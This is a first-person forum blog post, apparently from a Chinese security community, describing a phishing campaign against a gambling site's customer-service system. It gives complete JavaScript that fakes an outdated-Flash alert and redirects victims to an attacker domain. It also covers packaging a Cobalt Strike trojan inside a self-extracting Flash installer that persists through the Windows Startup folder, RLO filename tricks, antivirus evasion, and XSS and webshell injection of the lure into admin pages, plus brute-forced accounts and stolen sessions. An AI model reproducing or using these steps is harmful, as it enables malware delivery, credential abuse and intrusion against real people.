这篇文章写在我搞到某个bc的边缘系统的时候,没啥重要信息,而且没内网。但因为这是个客服系统所以,我决定钓鱼。想想都特码刺激。
他把所有能用到的工具都打包了,我们只需要弄个自解压文件,把木马和正常的flash安装包压缩,然后设置图标,设置解压后启动 。设置木马解压位置为(C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup)windows的自启动目录。 比较简单这里不放图了。自己摸索一下就知道了。再不会可以百度。
这里面的js弹窗是一直弹,就没法正常访问页面了,对方再蠢也知道中病毒了吧。我自己百度又结合这个改了一个 过段时间就会弹一次(时间需要自己设,毫秒为单位).
version.js
function getCookie(name) {
var cookiefound=false
var start=0
var end=0
var cookiestring=document.cookie;
var i=0;
while (i<=cookiestring.length)
{
start=i
end=start+name.length
if (cookiestring.substring(start,end)==name)
{cookiefound=true;
break;
}
i++;
}
if (cookiefound==true)
{
start=end+1;
end=cookiestring.indexOf(";",start);
if (end<start)
{
end=cookiestring.length;}
return cookiestring.substring(start,end);
}
return "";
}
function newcookie(id,value,guoqi)
{
var expires=new Date()
expires.setTime(expires.getTime()+20*60*1000) //我这里设置了每1/3小时弹一次。
var expiryDate=expires.toGMTString();
document.cookie=id+"="+value+";expires="+expiryDate
}
if (getCookie("Alerted")=="") {
window.alert = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert( "Your flash version is too low, try to upgrade and visit this page! ");
window.location.href="http://flashHacker.com"; #修改成你自己的免费域名
newcookie("Alerted","yes");
}
else
{
newcookie("Alerted","");
}
通过cs生成shellcode,然后通过python进行分离免杀。
具体看我的博客(好久没更新了)
http://kanjinisme.gitee.io/blog/2020/12/11/cs%E5%85%8D%E6%9D%80%E9%A9%AC/#more
现在我们木马有了,我们就可以通过winrar的自解压功能制作exe文件了。这里是我制作的。
你不一定要跟我一样,你可以通过RLO改成zip后缀等等自己发挥把。
这里我们使用的是香港服务器
http://www.webweb.com/
并赠送我们免费域名,我们可以通过临时邮箱注册,记住我们的用户名一定要起一个flash相关的名字,因为他赠送的免费域名是以我们的用户名起的。
但是这个免费的服务器有个很大的弊端,就是没能建立有汉字的页面,否则会报错。
找到文件管理,进入site1文件夹,在里面放入我们的flash.html页面.注意该页面不能有中文,中文符号也不行。不支持utf-8编码。
我们可以把flash.html里的中文都翻译成英文。然后就可以了.
它的文件上传功能不好用,我直接复制flash.html里的内容,然后,通过上图添加文件功能,添加的,修改名字为index.html.点击旁边的编辑按钮,我们可以把自己木马的地址(这里文件上传不好用,我把木马地址放我自己vps上了。)
在域名绑定里我们可以看到给我们分配的域名 ,这域名……好吧,毕竟是免费的。
访问一下,看看效果。
ok,没问题。
好了 ,该准备的,都准备好了,
然后你们就可以找一些存储型xss去弹了。
而我不同,
蚁剑启动!!! 随机挑选一个幸运儿。
直接修改网页。
然后再他的管理后台,客服服务界面,都加上了。
这里我直接将弹窗的js传上他的系统了,你也可以传到香港云上面。xss代码如下。
<script src="http://你的域名"></script>
<script> src="/version.js"></script>
等鱼儿上钩吧。嘿嘿~~~
香港云给的域名是http协议的,https无法跳转到http的域名,即如果对方是https协议的网站,无法通过我们的js跳转到http的网站,它认为是不安全的。,所以可以用gitee来搭建。
好的,注册一个gitee账号,账号名最好起flash相关的,之后需要绑定手机号,然后创建仓库,创建完成之后,点击服务,使用
然后点击启。。。我TM!@#¥%……&*()——
结束。
(还没结束。。。)
早上刚上班,发现风哥问我后续,我就在说说我咋办的吧。上面两种都没法用了,所以我决定直接把flash钓鱼页面上传到他的服务器上(自己的网站让下载flash,应该会信吧?会信吗?不会信吗?会信吗……),在他服务的根目录建立一个.flash目录(隐藏目录),把马和flash都放到里面,然后js那里,我们改成https://bc域名/.flash/index.html 也可以通过相对路径访问。
我用的是相对路径。
我之前爆破了一个客服账号,所以我通过其他漏洞获取的session登进去(不要问我为啥不用账号登,问就是会顶号,session不会。)试了下发现成功弹窗、成功跳转(不截图了,公司让保密)。
写到这,我接着就打开cs看看鱼儿上钩了没…..唉,我草,上线了。 这人得多笨啊。
赶紧打开他的桌面看看他在干啥。
咦,他怎么也再用cs……这尼玛不就是我嘛,昨天测试忘了删除自启动目录的木马了。
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-聂风 | 80.00 | 0 | 2021-04-30 14:02:48 | 目标也在用CS真的是骚呀 |
打赏我,让我更有动力~
© 2016 - 2023 掌控者 All Rights Reserved.
Track-聂风
发表于 2021-4-29
有没有后续了?写的可还行
评论列表
加载数据中...